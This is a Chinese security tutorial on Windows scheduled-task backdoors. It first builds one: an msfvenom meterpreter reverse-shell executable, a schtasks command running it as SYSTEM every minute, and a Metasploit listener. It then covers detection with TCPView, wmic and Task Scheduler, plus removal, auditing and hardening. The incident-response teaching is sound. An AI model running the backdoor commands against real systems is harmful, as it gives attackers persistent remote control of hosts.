Windows后门应急(二)--计划任务后门分析与处置|Windows取证分析

📢 免责声明

本文所述技术仅用于合法授权的安全研究、教学演示及防御机制开发。作者及发布平台不承担因读者误用、滥用本内容所导致的任何法律责任。请严格遵守《中华人民共和国网络安全法》及相关法律法规。

1.4.1. 攻击背景与前提条件

  • 攻击者已通过漏洞利用、弱口令等方式 getshell

  • 已获取目标服务器 Administrator 权限

  • 目标系统:Windows Server 2016

  • 目标目的:权限维持(Persistence)


1.4.2. 计划任务后门原理概述

计划任务后门是 Windows 环境中极为常见的一种权限维持手段,其核心思想是:

  • 利用 Windows 任务计划程序(Task Scheduler),定时或触发执行恶意程序,实现持续控制。

特点

  • 隐蔽性强(不依赖自启动项)

  • 稳定性高(系统原生机制)

  • 不易被一次性排查发现

1.4.3. 攻击实战:创建计划任务后门

⚠️ 本节用于理解攻击原理,仅用于应急响应与防御研究


1.4.3.1. 生成 EXE 类型后门程序

使用 MSF 生成反弹 shell 的 Windows 可执行文件:

复制代码
msfvenom -p windows/meterpreter/reverse_tcp \
lhost=198.168.1.9  \
lport=8888 \
-f exe -o 0xSec.exe

参数说明:

  • lhost

    :攻击者监听主机 IP

  • lport

    :攻击者监听端口

  • 0xSec.exe

    :生成的后门程序


1.4.3.2. 创建计划任务

0xSec.exe 上传至目标服务器(示例路径):

复制代码
C:\Users\Administrator\Desktop\0xSec.exe

在目标机上执行以下命令,创建名为 0xSec 的计划任务:

复制代码
schtasks /create /tn 0xSec /sc minute /mo 1 ^
/tr C:\Users\Administrator\Desktop\0xSec.exe ^
/ru system /f

参数说明:

  • /tn 0xSec

    :任务名

  • /sc minute /mo 1

    :每 1 分钟执行一次

  • /tr

    :执行的程序路径

  • /ru system

    :以 SYSTEM 权限运行

  • /f

    :强制创建

👉 此时后门已具备 SYSTEM 权限 + 定时执行能力


1.4.3.3. 监听反弹 Shell

攻击者本地 MSF 监听:

复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 198.168.1.9
set lport 8888
exploit

一分钟后,目标主机会主动回连,权限维持成功。


1.4.4. 应急响应:如何发现计划任务后门

1.4.4.1. 网络层异常发现(TCPView)

工具下载地址https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview

1.4.4.1.1. 为什么不用 netstat -ano
  • 计划任务是 周期性执行

  • netstat

    只能看到 当前瞬时连接

  • 很容易错过异常行为


1.4.4.1.2. 使用 TCPView 进行排查

TCPView 可实时展示:

  • 进程名

  • PID

  • 本地 / 远程 IP + 端口

  • 连接状态(颜色变化)

发现异常现象:

  • 进程名:0xSec.exe

  • 远程地址:198.168.1.9:8888

  • 连接状态:红绿交替(周期性)

  • PID:184192(示例)


1.4.4.1.3. 根据 PID 定位文件路径
复制代码
wmic process get name,executablepath,processid | findstr 184192

输出示例:

复制代码
C:\Users\Administrator\Desktop\0xSec.exe         0xSec.exe        184192
1.4.4.1.4. TCPView中双击获取文件路径

1.4.4.2. 行为分析判断

综合现象判断:

  • 程序周期性联网

  • 间隔约 1 分钟

  • 非系统正常服务

  • 执行路径异常(桌面)

👉高度怀疑存在计划任务后门


1.4.4.3. 查看计划任务(关键证据)

路径:

复制代码
控制面板 → 管理工具 → 任务计划程序

发现异常任务:

  • 任务名称:0xSec

  • 执行程序:C:\Users\Administrator\Desktop\0xSec.exe

  • 执行频率:每 1 分钟

  • 创建者:Administrator

结论:

攻击者已获取管理员权限,并植入计划任务后门


1.4.5. 处置流程(应急响应)

先断执行 → 再杀进程 → 再删文件


1.4.5.1. 删除计划任务
复制代码
schtasks /delete /tn 0xSec /f
1.4.5.2. 结束正在运行的后门进程
复制代码
taskkill /im 0xSec.exe /f
1.4.5.3. 删除恶意程序
复制代码
del C:\Users\Administrator\Desktop\0xSec.exe

1.4.5.4. 后续加固建议
  • 排查其他计划任务(一次性、触发型)

  • 审计安全日志(4698 / 4702)

  • 检查启动项、服务、自启动注册表

  • 重置管理员账户密码

  • 核查是否存在其他权限维持手段


1.4.5.5. 默认4698,4720是没有的,只有在 👉 启用了"计划任务审计策略"情况下才会有日志记录

开启"计划任务审计策略"

WIN+R

复制代码
gpedit.msc

本地组策略编辑器

→ 计算机配置

→ Windows 设置

→ 安全设置

→ 高级审核策略配置

→ 系统审核策略

→ 对象访问

→ 审核其他对象访问事件

再次生成计划任务,筛选事件,得到任务名称:0xSec,命令:C:\Users\Administrator\Desktop\0xSec.exe


1.4.6. 应急响应视角总结

  • 计划任务是 Windows 后门中最常见的权限维持方式之一

  • 排查重点不只是文件,而是:

    • 周期性网络行为
    • 任务计划程序
  • TCPView + 任务计划程序 = 高效发现组合

一句话总结给大家用:

看到"周期性联网的陌生进程",第一反应就该去看计划任务。

相关推荐
用户962377954489 小时前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主1 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954483 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机3 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机3 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954484 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star4 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954484 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
阿白的白日梦4 天前
winget基础管理---更新/修改源为国内源
windows
cipher5 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全